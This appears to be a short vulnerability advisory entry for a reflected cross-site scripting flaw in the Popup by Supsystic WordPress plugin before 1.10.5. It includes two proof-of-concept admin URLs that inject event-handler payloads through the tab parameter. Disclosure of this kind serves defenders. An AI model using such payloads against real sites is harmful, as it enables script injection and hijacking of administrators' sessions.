Lucene search

K
wpexploit0xB9WPEX-ID:EFDC76E0-C14A-4BAF-AF70-9D381107308F
HistoryApr 19, 2021 - 12:00 a.m.

Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)

2021-04-1900:00:00
0xB9
244

The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(1)//

/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related for WPEX-ID:EFDC76E0-C14A-4BAF-AF70-9D381107308F